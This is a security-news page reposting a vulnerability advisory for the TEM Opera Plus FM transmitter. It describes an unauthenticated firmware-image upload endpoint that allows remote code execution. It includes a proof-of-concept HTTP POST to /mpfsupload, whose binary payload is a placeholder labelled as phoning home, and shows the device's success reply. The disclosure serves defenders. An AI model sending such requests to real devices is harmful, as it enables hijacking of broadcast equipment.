Security
Headlines
HeadlinesLatestCVEs

Headline

TEM Opera Plus FM Family Transmitter 35.45 Remote Code Execution

TEM Opera Plus FM Family Transmitter version 35.45 suffers from a remote code execution vulnerability.

Packet Storm
#vulnerability#web#ios#php#rce#auth
TEM Opera Plus FM Family Transmitter 35.45 Remote Code ExecutionVendor: Telecomunicazioni Elettro Milano (TEM) S.r.l.Product web page: https://www.tem-italy.itAffected version: Software version: 35.45                  Webserver version: 1.7Summary: This new line of Opera plus FM Transmitters combines veryhigh efficiency, high reliability and low energy consumption in compactsolutions. They have innovative functions and features that can eliminatethe costs required by additional equipment: automatic exchange of audiosources, built-in stereo encoder, integrated RDS encoder, parallel I/Ocard, connectivity through GSM telemetry and/or TCP IP / SNMP / SMTPWebserver.Desc: The device allows access to an unprotected endpoint that allowsMPFS File System binary image upload without authentication. The MPFS2file system module provides a light-weight read-only file system thatcan be stored in external EEPROM, external serial Flash, or internalFlash program memory. This file system serves as the basis for theHTTP2 web server module, but is also used by the SNMP module and isavailable to other applications that require basic read-only storagecapabilities. This can be exploited to overwrite the flash programmemory that holds the web server's main interfaces and execute arbitrarycode.Tested on: WebserverVulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2023-5799Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5799.php18.08.2023--POST /mpfsupload HTTP/1.1Host: 192.168.1.2:8000Content-Length: 251Cache-Control: max-age=0Content-Type: multipart/form-data; boundary=----joxypoxy2User-Agent: MPFS2_PoC/2.0cAccept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close------joxypoxy2Content-Disposition: form-data; name="i"; filename="MPFSimg2.bin"Content-Type: application/octet-streamMPFS...<CGI BINARY PHONE HOME>-----joxypoxy2--HTTP/1.1 200 OKConnection: closeContent-Type: text/html<html><body style="margin:100px"><b>MPFS Update Successful</b><p><a href="/">Site main page</a></body></html>

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution